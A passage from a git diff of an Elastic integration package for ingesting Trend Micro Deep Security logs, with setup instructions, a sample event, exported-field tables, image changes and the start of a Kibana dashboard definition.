files. This integration has been tested against Deep Security v12 LTS. Please note is you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). +Elastic Agent is required to ingest data from Deep Security. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). 
+ +## Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. + +This integration has been tested against Deep Security 20. Please note if you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). + +## Setup + +Follow the [setup guide](https://help.deepsecurity.trendmicro.com/20_0/on-premise/event-syslog.html) to forward deep security events to a syslog server. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. 
In "Search for integrations" search bar, type Trend Micro. +3. Click on the "Trend Micro" integration from the search results. +4. Click on the "Add Trend Micro" button to add the integration. +5. Add all the required integration configuration parameters according to the enabled input type. +6. Click on "Save and Continue" to save the integration. ## Logs 
@@ -18,173 +53,197 @@ Elastic Agent is required to ingest data from Deep Security log files. This inte Deep Security logs collect the trendmicro deep security logs. +An example event for `deep_security` looks as following: + +```json +{ + "@timestamp": "2020-09-21T07:21:11.000Z", + "agent": { + "ephemeral_id": "2ea89e49-a391-4415-a8c4-c0ad743e691b", + "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.11.0" + }, + "data_stream": { + "dataset": "trendmicro.deep_security", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc", + "snapshot": false, + "version": "8.11.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "network" + ], + "code": "5000000", + "dataset": "trendmicro.deep_security", + "ingested": "2024-03-20T09:48:02Z", + "kind": "event", + "original": "194 <86>2020-09-21T13:51:11+06:30 DeepSec Logs CEF:0|Trend Micro|Deep Security Agent|10.2.229|5000000|WebReputation|5|cn1=1 cn1Label=Host ID dvchost=hostname request=example.com msg=Blocked By Admin", + "severity": 5, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "id": "1" + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "192.168.224.7:54066" + }, + "syslog": { + "priority": 86 + } + }, + "message": "Blocked By Admin", + "observer": { + "hostname": "hostname", + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "10.2.229" + }, + "related": { + "hosts": [ + "1" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "trendmicro.deep_security" + ], + "trendmicro": { + "deep_security": { + "device": { + "custom_number1": { + "label": "Host ID" + } + }, + "event_category": "web-reputation-event", + "signature_id": 5000000, + "version": "0" + } + }, + "url": { + "original": "example.com" + } +} +``` + **Exported fields** | Field | Description | Type | 
|---|---|---| | @timestamp | Event timestamp. | date | -| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | -| cloud.availability_zone | Availability zone in which this host is running. | keyword | -| cloud.image.id | Image ID for the cloud instance. | keyword | -| cloud.instance.id | Instance ID of the host machine. | keyword | -| cloud.instance.name | Instance name of the host machine. | keyword | -| cloud.machine.type | Machine type of the host machine. | keyword | -| cloud.project.id | Name of the project in Google Cloud. | keyword | -| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | -| cloud.region | Region in which this host is running. | keyword | -| container.id | Unique container id. | keyword | -| container.image.name | Name of the image the container was built on. | keyword | -| container.labels | Image labels. | object | -| container.name | Container name. | keyword | | data_stream.dataset | Data stream dataset. | constant_keyword | | data_stream.namespace | Data stream namespace. | constant_keyword | | data_stream.type | Data stream type. | constant_keyword | -| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | -| destination.as.organization.name | Organization name. | keyword | -| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | -| destination.bytes | Bytes sent from the destination to the source. | long | -| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. 
| keyword | -| destination.geo.city_name | City name. | keyword | -| destination.geo.continent_name | Name of the continent. | keyword | -| destination.geo.country_iso_code | Country ISO code. | keyword | -| destination.geo.country_name | Country name. | keyword | -| destination.geo.location | Longitude and latitude. | geo_point | -| destination.geo.region_iso_code | Region ISO code. | keyword | -| destination.geo.region_name | Region name. | keyword | -| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | -| destination.nat.ip | Translated ip of destination based NAT sessions (e.g. internet to private DMZ) Typically used with load balancers, firewalls, or routers. | ip | -| destination.nat.port | Port the source session is translated to by NAT Device. Typically used with load balancers, firewalls, or routers. | long | -| destination.port | Port of the destination. | long | -| destination.user.group.id | Unique identifier for the group on the system/platform. | keyword | -| destination.user.group.name | Name of the group. | keyword | -| destination.user.id | Unique identifier of the user. | keyword | -| destination.user.name | Short name or login of the user. | keyword | -| destination.user.name.text | Multi-field of `destination.user.name`. | match_only_text | -| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | -| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | -| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. 
`event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | -| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | -| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | -| event.id | Unique ID to describe the event. | keyword | -| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | -| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | -| event.original | Raw text message of entire event. 
Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | -| event.risk_score | Risk score or priority of the event (e.g. security solutions). Use your system's original value here. | float | -| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | -| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | -| file.group | Primary group name of the file. | keyword | -| file.hash.md5 | MD5 hash. | keyword | -| file.hash.sha1 | SHA1 hash. | keyword | -| file.hash.sha256 | SHA256 hash. | keyword | -| file.inode | Inode representing the file in the filesystem. | keyword | -| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | -| file.path.text | Multi-field of `file.path`. 
| match_only_text | -| file.size | File size in bytes. Only relevant when `file.type` is "file". | long | -| file.type | File type (file, dir, or symlink). | keyword | -| host.architecture | Operating system architecture. | keyword | -| host.containerized | If the host is a container. | boolean | -| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | -| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | -| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | -| host.ip | Host ip addresses. | ip | -| host.mac | Host mac addresses. | keyword | -| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | -| host.os.build | OS build information. | keyword | -| host.os.codename | OS codename, if any. | keyword | -| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | -| host.os.kernel | Operating system kernel version as a raw string. | keyword | -| host.os.name | Operating system name, without the version. | keyword | -| host.os.name.text | Multi-field of `host.os.name`. | text | -| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | -| host.os.version | Operating system version as a raw string. | keyword | -| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | -| http.request.method | HTTP request method. 
The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | -| http.request.referrer | Referrer for this HTTP request. | keyword | -| input.type | Input type | keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | | log.file.device_id | ID of the device containing the filesystem where the file resides. | keyword | | log.file.fingerprint | The sha256 fingerprint identity of the file when fingerprinting is enabled. | keyword | | log.file.idxhi | The high-order part of a unique identifier that is associated with a file. (Windows-only) | keyword | | log.file.idxlo | The low-order part of a unique identifier that is associated with a file. (Windows-only) | keyword | | log.file.inode | Inode number of the log file. | keyword | -| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | | log.file.vol | The serial number of the volume that contains a file. (Windows-only) | keyword | -| log.offset | Log offset | long | +| log.offset | Log offset. | long | | log.source.address | Source address from which the log event was read / sent from. | keyword | -| log.syslog.priority | Syslog numeric priority of the event, if available. According to RFCs 5424 and 3164, the priority is 8 \* facility + severity. This number is therefore expected to contain a value between 0 and 191. | long | -| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. 
| match_only_text | -| network.application | When a specific application or service is identified from network connection details (source/dest IPs, ports, certificates, or wire format), this field captures the application's or service's name. For example, the original event identifies the network connection being from a specific web service in a `https` network connection, like `facebook` or `twitter`. The field value must be normalized to lowercase for querying. | keyword | -| network.community_id | A hash of source and destination IPs and ports, as well as the protocol used in a communication. This is a tool-agnostic standard to identify flows. Learn more at https://github.com/corelight/community-id-spec. | keyword | -| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | -| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | -| observer.egress.zone | Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. | keyword | -| observer.hostname | Hostname of the observer. 
| keyword | -| observer.ingress.interface.name | Interface name as reported by the system. | keyword | -| observer.ingress.zone | Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. | keyword | -| observer.ip | IP addresses of the observer. | ip | -| observer.product | The product name of the observer. | keyword | -| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | -| observer.vendor | Vendor name of the observer. | keyword | -| observer.version | Observer version. | keyword | -| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | -| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | -| related.ip | All of the IPs seen on your event. | ip | -| related.user | All the user names or other user identifiers seen on the event. | keyword | -| rule.category | A categorization value keyword used by the entity using the rule for detection of this event. | keyword | -| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | -| rule.uuid | A rule ID that is unique within the scope of a set or group of agents, observers, or other entities using the rule for detection of this event. | keyword | -| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | -| source.as.organization.name | Organization name. 
| keyword | -| source.as.organization.name.text | Multi-field of `source.as.organization.name`. | match_only_text | -| source.bytes | Bytes sent from the source to the destination. | long | -| source.domain | The domain name of the source system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | -| source.geo.city_name | City name. | keyword | -| source.geo.continent_name | Name of the continent. | keyword | -| source.geo.country_iso_code | Country ISO code. | keyword | -| source.geo.country_name | Country name. | keyword | -| source.geo.location | Longitude and latitude. | geo_point | -| source.geo.region_iso_code | Region ISO code. | keyword | -| source.geo.region_name | Region name. | keyword | -| source.ip | IP address of the source (IPv4 or IPv6). | ip | -| source.nat.ip | Translated ip of source based NAT sessions (e.g. internal client to internet) Typically connections traversing load balancers, firewalls, or routers. | ip | -| source.nat.port | Translated port of source based NAT sessions. (e.g. internal client to internet) Typically used with load balancers, firewalls, or routers. | long | -| source.port | Port of the source. | long | -| source.user.group.id | Unique identifier for the group on the system/platform. | keyword | -| source.user.group.name | Name of the group. | keyword | -| source.user.id | Unique identifier of the user. | keyword | -| source.user.name | Short name or login of the user. | keyword | -| source.user.name.text | Multi-field of `source.user.name`. | match_only_text | -| tags | List of keywords used to tag each event. | keyword | -| trendmicro.event.action_reason | The reason why application control performed the specified action, such as "notWhitelisted" (the software did not have a matching rule, and application control was configured to block unrecognized software). 
| keyword |
-| trendmicro.event.aggregation_type | An integer that indicates how the event is aggregated. | keyword |
-| trendmicro.event.category | proper categorization of some events. | keyword |
-| trendmicro.event.count | The number of occurrences of the event. | keyword |
-| trendmicro.event.ethernet_frame_type | Connection ethernet frame type. | keyword |
-| trendmicro.event.ips_flag | A combined value that includes the sum of the flag values. | keyword |
-| trendmicro.event.ips_packet_position | Position within packet of data that triggered the event. | keyword |
-| trendmicro.event.ips_stream_position | Position within stream of data that triggered the event. | keyword |
-| trendmicro.event.log_inspection_description | The Log Inspection sub-rule which triggered this event. | keyword |
-| trendmicro.event.malware_target | The file, process, or registry key (if any) that the malware was trying to affect. If the malware was trying to affect more than one, this field will contain the value "Multiple." | keyword |
-| trendmicro.event.malware_target_type | The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. | keyword |
-| trendmicro.event.message | The event short message. | keyword |
-| trendmicro.event.name | Name of the event type. | keyword |
-| trendmicro.event.old_file_path | The previous integrity rule target entity to capture the rename action from the previous target entity to the new, which is recorded in the filePath field. | keyword |
-| trendmicro.event.packet_data | The packet data, represented in Base64. | keyword |
-| trendmicro.event.packet_fragmentation | Packet Fragmentation Information. | keyword |
-| trendmicro.event.probable_threat_type | Probable Threat Type.Indicates the most likely type of threat contained in the file after Predictive Machine Learning compared the analysis to other known threats(separate by semicolon";" ).
| keyword |
-| trendmicro.event.signature_id | The "Signature ID" value indicates what kind of event has been triggered. | integer |
-| trendmicro.event.spyware_resourcetype | Resource Type values.For example, if there's a spyware file named spy.exe that creates a registry run key to keep its persistence after system reboot, there will be two items in the spyware report; the item for spy.exe has Files and Directories, and the item for the run key registry has System Registry. | keyword |
-| trendmicro.event.spyware_risklevel | Risk level values. | keyword |
-| trendmicro.event.tags | Deep Security event tags assigned to the event. | keyword |
-| trendmicro.event.target | The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. | keyword |
-| trendmicro.event.target_id | The identifier added in the manager. | keyword |
-| trendmicro.event.target_type | The event target entity type. | keyword |
-| trendmicro.event.tcp_flag | TCP Flag. | keyword |
-| trendmicro.event.tenant_id | Deep Security tenant ID. | keyword |
-| trendmicro.event.tenant_name | Deep Security tenant name. | keyword |
-| trendmicro.event.threat_probability | Indicates how closely (in %) the file matched the malware model. | keyword |
-| trendmicro.event.threat_type | The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. | keyword |
-| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard |
-| url.original.text | Multi-field of `url.original`. | match_only_text |
-| user_agent.original | Unparsed user_agent string. | keyword |
-| user_agent.original.text | Multi-field of `user_agent.original`.
| match_only_text |
+| source.process.name | Source process name. | keyword |
+| tags | User defined tags. | keyword |
+| trendmicro.deep_security.action | The action detected by the integrity rule. | keyword |
+| trendmicro.deep_security.aggregation_type | An integer that indicates how the event is aggregated:. | keyword |
+| trendmicro.deep_security.base_event_count | Base event count. | long |
+| trendmicro.deep_security.bytes_in | Number of inbound bytes read. | long |
+| trendmicro.deep_security.computer_name | The computer name. | keyword |
+| trendmicro.deep_security.destination.address | IP address of the destination computer. | ip |
+| trendmicro.deep_security.destination.mac_address | Destination MAC Address. | keyword |
+| trendmicro.deep_security.destination.port | Port number of the destination computer's connection or session. | long |
+| trendmicro.deep_security.destination.user_name | Destination user name. | keyword |
+| trendmicro.deep_security.device.custom_number1.label | The name label for the field cn1. | keyword |
+| trendmicro.deep_security.device.custom_number1.value | The value for the field cn1. | keyword |
+| trendmicro.deep_security.device.custom_number2.label | The name label for the field cn2. | keyword |
+| trendmicro.deep_security.device.custom_number2.value | The value for the field cn2. | long |
+| trendmicro.deep_security.device.custom_number3.label | The name label for the field cn3. | keyword |
+| trendmicro.deep_security.device.custom_number3.value | The value for the field cn3. | long |
+| trendmicro.deep_security.device.custom_string1.label | The name label for the field cs1. | keyword |
+| trendmicro.deep_security.device.custom_string1.value | The value for the field cs1. | keyword |
+| trendmicro.deep_security.device.custom_string2.label | The name label for the field cs2. | keyword |
+| trendmicro.deep_security.device.custom_string2.value | The value for the field cs2.
| keyword |
+| trendmicro.deep_security.device.custom_string3.label | The name label for the field cs3. | keyword |
+| trendmicro.deep_security.device.custom_string3.value | The value for the field cs3. | keyword |
+| trendmicro.deep_security.device.custom_string4.label | The name label for the field cs4. | keyword |
+| trendmicro.deep_security.device.custom_string4.value | The value for the field cs4. | keyword |
+| trendmicro.deep_security.device.custom_string5.label | The name label for the field cs5. | keyword |
+| trendmicro.deep_security.device.custom_string5.value | The value for the field cs5. | keyword |
+| trendmicro.deep_security.device.custom_string6.label | The name label for the field cs6. | keyword |
+| trendmicro.deep_security.device.custom_string6.value | The value for the field cs6. | keyword |
+| trendmicro.deep_security.device.custom_string7.label | The name label for the field cs7. | keyword |
+| trendmicro.deep_security.device.custom_string7.value | The value for the field cs7. | keyword |
+| trendmicro.deep_security.device.product | Product name. | keyword |
+| trendmicro.deep_security.device.vendor | Vendor name. | keyword |
+| trendmicro.deep_security.device.version | Product version. | keyword |
+| trendmicro.deep_security.deviceHostName | The hostname for cn1. | keyword |
+| trendmicro.deep_security.domain_name | The domain name. | keyword |
+| trendmicro.deep_security.event_category | Event category of deep security event. | keyword |
+| trendmicro.deep_security.event_class_id | Event Class ID. | keyword |
+| trendmicro.deep_security.file.hash | The SHA 256 hash that identifies the software file. | keyword |
+| trendmicro.deep_security.file.size | The file size in bytes. | long |
+| trendmicro.deep_security.file_path | The location of the malware file. | keyword |
+| trendmicro.deep_security.filename | The file name that was accessed. | keyword |
+| trendmicro.deep_security.message | A list of changed attribute names.
| keyword |
+| trendmicro.deep_security.model | The product name of the device. | keyword |
+| trendmicro.deep_security.name | CEF event containing message. | keyword |
+| trendmicro.deep_security.permission | The block reason of the access. | keyword |
+| trendmicro.deep_security.process.name | The process name. | keyword |
+| trendmicro.deep_security.repeat_count | The number of occurrences of the event. | keyword |
+| trendmicro.deep_security.request_url | The URL of the request. | keyword |
+| trendmicro.deep_security.result | The result of the failed Anti-Malware action. | keyword |
+| trendmicro.deep_security.serial | The serial number of the device. | keyword |
+| trendmicro.deep_security.severity | Severity of the Event. | long |
+| trendmicro.deep_security.signature_id | Signature ID of event. | long |
+| trendmicro.deep_security.source.address | Source computer IP address. | ip |
+| trendmicro.deep_security.source.host_name | Source computer hostname. | keyword |
+| trendmicro.deep_security.source.mac_address | MAC address of the source computer's network interface. | keyword |
+| trendmicro.deep_security.source.port | Port number of the source computer's connection or session. | long |
+| trendmicro.deep_security.source.process_name | The name of the event's source process. | keyword |
+| trendmicro.deep_security.source.user_id | Source user ID. | keyword |
+| trendmicro.deep_security.source.user_name | Account of the user who changed the file being monitored. | keyword |
+| trendmicro.deep_security.target.id | The identifier added in the manager. | keyword |
+| trendmicro.deep_security.target.value | The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. | keyword |
+| trendmicro.deep_security.transport_protocol | Name of the transport protocol used. | keyword |
+| trendmicro.deep_security.trendmicro.ds_behavior.rule_id | The behavior monitoring rule ID for internal malware case tracking.
| keyword |
+| trendmicro.deep_security.trendmicro.ds_behavior.type | The type of behavior monitoring event detected. | keyword |
+| trendmicro.deep_security.trendmicro.ds_command_line | The commands that the subject process executes. | keyword |
+| trendmicro.deep_security.trendmicro.ds_cve | The CVE information, if the process behavior is identified in one of Common Vulnerabilities and Exposures. | keyword |
+| trendmicro.deep_security.trendmicro.ds_detection_confidence | Indicates how closely the file matched the malware model. | long |
+| trendmicro.deep_security.trendmicro.ds_file.md5 | The MD5 hash of the file. | keyword |
+| trendmicro.deep_security.trendmicro.ds_file.sha1 | The SHA1 hash of the file. | keyword |
+| trendmicro.deep_security.trendmicro.ds_file.sha256 | The SHA256 hash of the file. | keyword |
+| trendmicro.deep_security.trendmicro.ds_frame_type | Connection ethernet frame type. | keyword |
+| trendmicro.deep_security.trendmicro.ds_malware_target.count | The number of target files. | long |
+| trendmicro.deep_security.trendmicro.ds_malware_target.type | The type of system resource that this malware was trying to affect. | keyword |
+| trendmicro.deep_security.trendmicro.ds_malware_target.value | The file, process, or registry key (if any) that the malware was trying to affect. | keyword |
+| trendmicro.deep_security.trendmicro.ds_mitre | The MITRE information, if the process behavior is identified in one of MITRE attack scenarios. | keyword |
+| trendmicro.deep_security.trendmicro.ds_packet_data | The packet data, represented in Base64. | keyword |
+| trendmicro.deep_security.trendmicro.ds_process | Name of ds process. | keyword |
+| trendmicro.deep_security.trendmicro.ds_relevant_detection_names | Probable Threat Type. | keyword |
+| trendmicro.deep_security.trendmicro.ds_tenant | Deep Security tenant. | keyword |
+| trendmicro.deep_security.trendmicro.ds_tenant_id | Deep Security tenant ID.
| keyword | +| trendmicro.deep_security.type | The device type of the device. | keyword | +| trendmicro.deep_security.version | Deep Security version. | keyword | +| trendmicro.deep_security.xff | The IP address of the last hub in the X-Forwarded-For header. | ip | diff --git a/packages/trendmicro/img/Trend-Micro-Logo.svg b/packages/trendmicro/img/Trend-Micro-Logo.svg deleted file mode 100644 index a20e1dad4a6..00000000000 --- a/packages/trendmicro/img/Trend-Micro-Logo.svg +++ /dev/null @@ -1,147 +0,0 @@ - - - - - - - image/svg+xml - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/packages/trendmicro/img/sample-logo.svg b/packages/trendmicro/img/sample-logo.svg deleted file mode 100644 index 6268dd88f3b..00000000000 --- a/packages/trendmicro/img/sample-logo.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/packages/trendmicro/img/sample-screenshot.png b/packages/trendmicro/img/sample-screenshot.png deleted file mode 100644 index d7a56a3ecc0..00000000000 Binary files a/packages/trendmicro/img/sample-screenshot.png and /dev/null differ diff --git a/packages/trendmicro/img/trend-micro-deep-security-dashboard-screenshot.png b/packages/trendmicro/img/trend-micro-deep-security-dashboard-screenshot.png deleted file mode 100644 index 8550129b29d..00000000000 Binary files a/packages/trendmicro/img/trend-micro-deep-security-dashboard-screenshot.png and /dev/null differ diff --git a/packages/trendmicro/img/trend-micro-logo.svg b/packages/trendmicro/img/trend-micro-logo.svg new file mode 100644 index 00000000000..70a04e98eca --- /dev/null +++ b/packages/trendmicro/img/trend-micro-logo.svg @@ -0,0 +1,9 @@ + + + + + + + + + 
diff --git a/packages/trendmicro/img/trendmicro-deep_security-dashboard.png b/packages/trendmicro/img/trendmicro-deep_security-dashboard.png
new file mode 100644
index 00000000000..ce23a748693
Binary files /dev/null and b/packages/trendmicro/img/trendmicro-deep_security-dashboard.png differ
diff --git a/packages/trendmicro/kibana/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d.json b/packages/trendmicro/kibana/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d.json
new file mode 100644
index 00000000000..dabc6df903d
--- /dev/null
+++ b/packages/trendmicro/kibana/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d.json
@@ -0,0 +1,1190 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"5c39feda-a37e-412b-b289-bfe4b7431187\":{\"type\":\"rangeSliderControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5c39feda-a37e-412b-b289-bfe4b7431187\",\"fieldName\":\"event.severity\",\"title\":\"Event Severity\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"741c9ea5-a76e-4689-813a-575608fba5b0\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"741c9ea5-a76e-4689-813a-575608fba5b0\",\"fieldName\":\"trendmicro.deep_security.event_category\",\"title\":\"Event Category\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Overview of the Trend Micro Deep Security Logs.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "trendmicro.deep_security" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "trendmicro.deep_security" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + 
"id": "", + "params": { + "fontSize": 12, + "markdown": "Navigation\n\n[Trend Micro Deep Security (This Page)](#/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d)\n\n[Integration Page](/app/integrations/detail/trendmicro-1.9.0/overview)\n\nOverview\n\nThis dashboard shows the deep security overview related to the Trend Micro Integration.\n\nThis dashboard is made to provide general statistics and show the detection of various ingested events.\n\nIt provides information about the event by action and and distribution of events by the severity. It also displays event over hostname and host ID. It displays top source IPs and top destination IPs seen on the event. Furthermore, it also shows the distribution of events by category and event code.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 20, + "i": "0a669a02-0faf-47fc-ac73-fdb78aa9fff8", + "w": 13, + "x": 0, + "y": 0 + }, + "panelIndex": "0a669a02-0faf-47fc-ac73-fdb78aa9fff8", + "title": "Table of Contents", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-530d0aff-656d-449a-a077-460145061b6f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "530d0aff-656d-449a-a077-460145061b6f": { + "columnOrder": [ + "1b35bee8-d015-4d9d-b531-13405efb426f", + 